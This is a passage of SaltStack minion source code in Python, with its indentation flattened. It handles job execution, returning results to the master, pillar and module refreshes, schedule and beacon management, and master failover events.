name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
if multiprocessing_enabled and not salt.utils.platform.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
else:
self.win_proc.append(process)
def ctx(self):
'''
Return a single context manager for the minion's data
'''
if six.PY2:
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
else:
exitstack = contextlib.ExitStack()
exitstack.enter_context(self.functions.context_dict.clone())
exitstack.enter_context(self.returners.context_dict.clone())
exitstack.enter_context(self.executors.context_dict.clone())
return exitstack
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.user.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
def run_func(minion_instance, opts, data):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
return Minion._thread_multi_return(minion_instance, opts, data)
else:
return Minion._thread_return(minion_instance, opts, data)
with tornado.stack_context.StackContext(functools.partial(RequestContext,
{'data': data, 'opts': opts})):
with tornado.stack_context.StackContext(minion_instance.ctx):
run_func(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target; it starts the actual
minion-side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.process.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job %s with PID %s', data['jid'], sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
executors = data.get('module_executors') or \
getattr(minion_instance, 'module_executors', []) or \
opts.get('module_executors', ['direct_call'])
allow_missing_funcs = any([
minion_instance.executors['{0}.allow_missing_func'.format(executor)](function_name)
for executor in executors
if '{0}.allow_missing_func'.format(executor) in minion_instance.executors
])
if function_name in minion_instance.functions or allow_missing_funcs is True:
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
# use minion_blackout_whitelist from grains if it exists
if minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
if function_name in minion_instance.functions:
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
else:
# only run if function_name is not in minion_instance.functions and allow_missing_funcs is True
func = function_name
args, kwargs = data['arg'], data
minion_instance.functions.pack['__context__']['retcode'] = 0
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo':
executors[-1] = 'sudo' # replace the last one with sudo
log.trace('Executors list %s', executors) # pylint: disable=no-member
for name in executors:
fname = '{0}.execute'.format(name)
if fname not in minion_instance.executors:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return_data = minion_instance.executors[fname](opts, data, func, args, kwargs)
if return_data is not None:
break
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], six.text_type(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
retcode = minion_instance.functions.pack['__context__'].get(
'retcode',
salt.defaults.exitcodes.EX_OK
)
if retcode == salt.defaults.exitcodes.EX_OK:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(return_data.get(x, True)
for x in ('result', 'success'))
except Exception:
# return data is not a dict
func_result = True
if not func_result:
retcode = salt.defaults.exitcodes.EX_GENERIC
ret['retcode'] = retcode
ret['success'] = retcode == salt.defaults.exitcodes.EX_OK
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except CommandExecutionError as exc:
log.error(
'A command in \'%s\' had a problem: %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except SaltInvocationError as exc:
log.error(
'Problem executing \'%s\': %s',
function_name, exc,
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(
function_name, exc, func.__doc__ or ''
)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
else:
docs = minion_instance.functions['sys.doc']('{0}*'.format(function_name))
if docs:
docs[function_name] = minion_instance.functions.missing_fun_string(function_name)
ret['return'] = docs
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
# Add default returners from minion config
# Should have been converted to a comma-delimited string already
if isinstance(opts.get('return'), six.string_types):
if data['ret']:
data['ret'] = ','.join((data['ret'], opts['return']))
else:
data['ret'] = opts['return']
log.debug('minion return: %s', ret)
# TODO: make a list? Seems odd to split it this late :/
if data['ret'] and isinstance(data['ret'], six.string_types):
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
returner_str = '{0}.returner'.format(returner)
if returner_str in minion_instance.returners:
minion_instance.returners[returner_str](ret)
else:
returner_err = minion_instance.returners.missing_fun_string(returner_str)
log.error(
'Returner %s could not be loaded: %s',
returner_str, returner_err
)
except Exception as exc:
log.exception(
'The return failed for job %s: %s', data['jid'], exc
)
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target; it starts the actual
minion-side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.process.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID %s', sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
multifunc_ordered = opts.get('multifunc_ordered', False)
num_funcs = len(data['fun'])
if multifunc_ordered:
ret = {
'return': [None] * num_funcs,
'retcode': [None] * num_funcs,
'success': [False] * num_funcs
}
else:
ret = {
'return': {},
'retcode': {},
'success': {}
}
for ind in range(0, num_funcs):
if not multifunc_ordered:
ret['success'][data['fun'][ind]] = False
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
elif minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
key = ind if multifunc_ordered else data['fun'][ind]
ret['return'][key] = func(*args, **kwargs)
retcode = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
if retcode == 0:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(ret['return'][key].get(x, True)
for x in ('result', 'success'))
except Exception:
# return data is not a dict
func_result = True
if not func_result:
retcode = 1
ret['retcode'][key] = retcode
ret['success'][key] = retcode == 0
except Exception as exc:
trb = traceback.format_exc()
log.warning('The minion function caused an exception: %s', exc)
if multifunc_ordered:
ret['return'][ind] = trb
else:
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job %s: %s',
data['jid'], exc
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
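# Typical ``ret`` structure passed in from _thread_return() (illustrative;
# the field values are assumptions):
#   {'jid': '20190101000000000000', 'fun': 'test.ping', 'fun_args': [],
#    'return': True, 'retcode': 0, 'success': True}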
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: %s', jid)
log.trace('Return data: %s', ret)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['uid'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error(
'Invalid outputter %s. This is likely a bug.',
ret['out']
)
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
if ret['jid'] == 'req':
ret['jid'] = salt.utils.jid.gen_jid(self.opts)
salt.utils.minion.cache_jobs(self.opts, ret['jid'], ret)
if not self.opts['pub_ret']:
return ''
def timeout_handler(*_):
log.warning(
'The minion failed to return the job information for job %s. '
'This is often due to the master being shut down or '
'overloaded. If the master is running, consider increasing '
'the worker_threads value.', jid
)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = %s', ret_val) # pylint: disable=no-member
return ret_val
def _return_pub_multi(self, rets, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
if not isinstance(rets, list):
rets = [rets]
jids = {}
for ret in rets:
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: %s', jid)
load = jids.setdefault(jid, {})
if ret_cmd == '_syndic_return':
if not load:
load.update({'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__'),
'return': {}})
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load.update({'id': self.opts['id']})
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error(
'Invalid outputter %s. This is likely a bug.',
ret['out']
)
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
salt.utils.minion.cache_jobs(self.opts, load['jid'], ret)
load = {'cmd': ret_cmd,
'load': list(six.itervalues(jids))}
def timeout_handler(*_):
log.warning(
'The minion failed to return the job information for job %s. '
'This is often due to the master being shut down or '
'overloaded. If the master is running, consider increasing '
'the worker_threads value.', jid
)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = %s', ret_val) # pylint: disable=no-member
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
if self.opts.get('master_type', 'str') == 'disable' and \
self.opts.get('file_client', 'remote') == 'remote':
log.warning(
'Cannot run startup_states when \'master_type\' is set '
'to \'disable\' and \'file_client\' is set to '
'\'remote\'. Skipping.'
)
else:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
if self.opts['enable_legacy_startup_events']:
# Old style event. Defaults to False in Sodium release.
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# send name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify=%s', notify)
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
def beacons_refresh(self):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing beacons.')
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
def matchers_refresh(self):
'''
Refresh the matchers
'''
log.debug('Refreshing matchers.')
self.matchers = salt.loader.matchers(self.opts)
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False, notify=False):
'''
Refresh the pillar
'''
if self.connected:
log.debug('Refreshing pillar. Notify: %s', notify)
async_pillar = salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
)
try:
self.opts['pillar'] = yield async_pillar.compile_pillar()
if notify:
evt = salt.utils.event.get_event('minion', opts=self.opts, listen=False)
evt.fire_event({'complete': True}, tag=salt.defaults.events.MINION_PILLAR_COMPLETE)
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
finally:
async_pillar.destroy()
self.module_refresh(force_refresh, notify)
self.matchers_refresh()
self.beacons_refresh()
def manage_schedule(self, tag, data):
'''
Refresh the functions and returners.
'''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
funcs = {'delete': ('delete_job', (name, persist)),
'add': ('add_job', (schedule, persist)),
'modify': ('modify_job',
(name, schedule, persist)),
'enable': ('enable_schedule', ()),
'disable': ('disable_schedule', ()),
'enable_job': ('enable_job', (name, persist)),
'disable_job': ('disable_job', (name, persist)),
'postpone_job': ('postpone_job', (name, data)),
'skip_job': ('skip_job', (name, data)),
                 'reload': ('reload', (schedule,)),
                 'list': ('list', (where,)),
                 'save_schedule': ('save_schedule', ()),
                 'get_next_fire_time': ('get_next_fire_time',
                                        (name,))}
# Call the appropriate schedule function
try:
alias, params = funcs.get(func)
getattr(self.schedule, alias)(*params)
except TypeError:
log.error('Function "%s" is unavailable in salt.utils.scheduler',
func)
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
include_pillar = data.get('include_pillar', None)
include_opts = data.get('include_opts', None)
funcs = {'add': ('add_beacon', (name, beacon_data)),
'modify': ('modify_beacon', (name, beacon_data)),
'delete': ('delete_beacon', (name,)),
'enable': ('enable_beacons', ()),
'disable': ('disable_beacons', ()),
'enable_beacon': ('enable_beacon', (name,)),
'disable_beacon': ('disable_beacon', (name,)),
'list': ('list_beacons', (include_opts,
include_pillar)),
'list_available': ('list_available_beacons', ()),
'validate_beacon': ('validate_beacon', (name,
beacon_data)),
'reset': ('reset', ())}
# Call the appropriate beacon function
try:
alias, params = funcs.get(func)
getattr(self.beacons, alias)(*params)
except AttributeError:
log.error('Function "%s" is unavailable in salt.beacons', func)
except TypeError as exc:
log.info(
'Failed to handle %s with data(%s). Error: %s',
tag, data, exc,
exc_info_on_loglevel=logging.DEBUG
)
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
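        # Illustrative sketch (example values assumed): event data of the form
        #   {'environ': {'FOO': 'bar'}, 'false_unsets': False, 'clear_all': False}
        # results in mod_environ.setenv({'FOO': 'bar'}, False, False) below.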
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This %s was scheduled to stop. Not running %s.tune_in()',
self.__class__.__name__, self.__class__.__name__
)
return
elif self._running is True:
log.error(
'This %s is already running. Not running %s.tune_in()',
self.__class__.__name__, self.__class__.__name__
)
return
try:
log.info(
'%s is starting as user \'%s\'',
self.__class__.__name__, salt.utils.user.get_user()
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.platform.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting %s',
self.__class__.__name__,
exc_info=err
)
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.client.ReqChannel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
finally:
channel.close()
def _handle_tag_module_refresh(self, tag, data):
'''
Handle a module_refresh event
'''
self.module_refresh(
force_refresh=data.get('force_refresh', False),
notify=data.get('notify', False)
)
@tornado.gen.coroutine
def _handle_tag_pillar_refresh(self, tag, data):
'''
Handle a pillar_refresh event
'''
yield self.pillar_refresh(
force_refresh=data.get('force_refresh', False),
notify=data.get('notify', False)
)
def _handle_tag_beacons_refresh(self, tag, data):
'''
Handle a beacon_refresh event
'''
self.beacons_refresh()
def _handle_tag_matchers_refresh(self, tag, data):
'''
Handle a matchers_refresh event
'''
self.matchers_refresh()
def _handle_tag_manage_schedule(self, tag, data):
'''
Handle a manage_schedule event
'''
self.manage_schedule(tag, data)
def _handle_tag_manage_beacons(self, tag, data):
'''
Handle a manage_beacons event
'''
self.manage_beacons(tag, data)
def _handle_tag_grains_refresh(self, tag, data):
'''
Handle a grains_refresh event
'''
if (data.get('force_refresh', False) or
self.grains_cache != self.opts['grains']):
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
def _handle_tag_environ_setenv(self, tag, data):
'''
Handle a environ_setenv event
'''
self.environ_setenv(tag, data)
def _handle_tag_minion_mine(self, tag, data):
'''
Handle a _minion_mine event
'''
self._mine_send(tag, data)
def _handle_tag_fire_master(self, tag, data):
'''
Handle a fire_master event
'''
if self.connected:
log.debug('Forwarding master event tag=%s', data['tag'])
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
def _handle_tag_master_disconnected_failback(self, tag, data):
'''
Handle a master_disconnected_failback event
'''
            # if the master disconnect event is for a different master, ignore it
            if tag.startswith(master_event(type='disconnected')) and data['master'] != self.opts['master']:
                # not our master, ignore
return
if tag.startswith(master_event(type='failback')):
# if the master failback event is not for the top master, raise an exception
if data['master'] != self.opts['master_list'][0]:
raise SaltException('Bad master \'{0}\' when mine failback is \'{1}\''.format(
data['master'], self.opts['master']))
# if the master failback event is for the current master, raise an exception
elif data['master'] == self.opts['master'][0]:
raise SaltException('Already connected to \'{0}\''.format(data['master']))
if self.connected:
# we are not connected anymore
self.connected = False
log.info('Connection to master %s lost', self.opts['master'])
# we can't use the config default here because the default '0' value is overloaded
# to mean 'if 0 disable the job', but when salt detects a timeout it also sets up
# these jobs
master_alive_interval = self.opts['master_alive_interval'] or 60
if self.opts['master_type'] != 'failover':
# modify the scheduled job to fire on reconnect
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': master_alive_interval,
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
else:
            # delete the scheduled job so it does not interfere with the failover process
if self.opts['transport'] != 'tcp':
self.schedule.delete_job(name=master_event(type='alive', master=self.opts['master']),
persist=True)
log.info('Trying to tune in to next master from master-list')
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'auth'):
self.pub_channel.auth.invalidate()
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
try:
master, self.pub_channel = yield self.eval_master(
opts=self.opts,
failed=True,
failback=tag.startswith(master_event(type='failback')))
except SaltClientError:
pass
if self.connected:
self.opts['master'] = master
# re-init the subsystems to work with the new master
log.info(
'Re-initialising subsystems for new master %s',
self.opts['master']
)
# put the current schedule into the new loaders
self.opts['schedule'] = self.schedule.option('schedule')
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
            # make the schedule use the new 'functions' loader
self.schedule.functions = self.functions
self.pub_channel.on_recv(self._handle_payload)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': master_alive_interval,
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
if self.opts['master_failback'] and 'master_list' in self.opts:
if self.opts['master'] != self.opts['master_list'][0]:
schedule = {
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
self.schedule.modify_job(name=master_event(type='failback'),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='failback'), persist=True)
else:
self.restart = True
self.io_loop.stop()
def _handle_tag_master_connected(self, tag, data):
'''
Handle a master_connected event
'''
# handle this event only once. otherwise it will pollute the log
# also if master type is failover all the reconnection work is done
# by `disconnected` event handler and this event must never happen,
# anyway check it to be sure
if not self.connected and self.opts['master_type'] != 'failover':
log.info('Connection to master %s re-established', self.opts['master'])
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
if self.opts['transport'] != 'tcp':
if self.opts['master_alive_interval'] > 0:
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='alive', master=self.opts['master']), persist=True)
def _handle_tag_schedule_return(self, tag, data):
'''
Handle a _schedule_return event
'''
# reporting current connection with master
if data['schedule'].startswith(master_event(type='alive', master='')):
if data['return']:
log.debug(
'Connected to master %s',
data['schedule'].split(master_event(type='alive', master=''))[1]
)
self._return_pub(data, ret_cmd='_return', sync=False)
def _handle_tag_salt_error(self, tag, data):
'''
Handle a _salt_error event
'''
if self.connected:
log.debug('Forwarding salt error event tag=%s', tag)
self._fire_master(data, tag)
def _handle_tag_salt_auth_creds(self, tag, data):
'''
Handle a salt_auth_creds event
'''
key = tuple(data['key'])
log.debug(
'Updating auth data for %s: %s -> %s',
key, salt.crypt.AsyncAuth.creds_map.get(key), data['creds']
)
salt.crypt.AsyncAuth.creds_map[tuple(data['key'])] = data['creds']
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
if not self.ready:
raise tornado.gen.Return()
tag, data = salt.utils.event.SaltEvent.unpack(package)
log.debug(
'Minion of \'%s\' is handling event tag \'%s\'',
self.opts['master'], tag
)
tag_functions = {
'beacons_refresh': self._handle_tag_beacons_refresh,
'environ_setenv': self._handle_tag_environ_setenv,
'fire_master': self._handle_tag_fire_master,
'grains_refresh': self._handle_tag_grains_refresh,
'matchers_refresh': self._handle_tag_matchers_refresh,
'manage_schedule': self._handle_tag_manage_schedule,
'manage_beacons': self._handle_tag_manage_beacons,
'_minion_mine': self._handle_tag_minion_mine,
'module_refresh': self._handle_tag_module_refresh,
'pillar_refresh': self._handle_tag_pillar_refresh,
'salt/auth/creds': self._handle_tag_salt_auth_creds,
'_salt_error': self._handle_tag_salt_error,
'__schedule_return': self._handle_tag_schedule_return,
master_event(type='disconnected'): self._handle_tag_master_disconnected_failback,
master_event(type='failback'): self._handle_tag_master_disconnected_failback,
master_event(type='connected'): self._handle_tag_master_connected,
}
# Run the appropriate function
for tag_function in tag_functions:
if tag.startswith(tag_function):
tag_functions[tag_function](tag, data)
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.platform.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
def _setup_core(self):
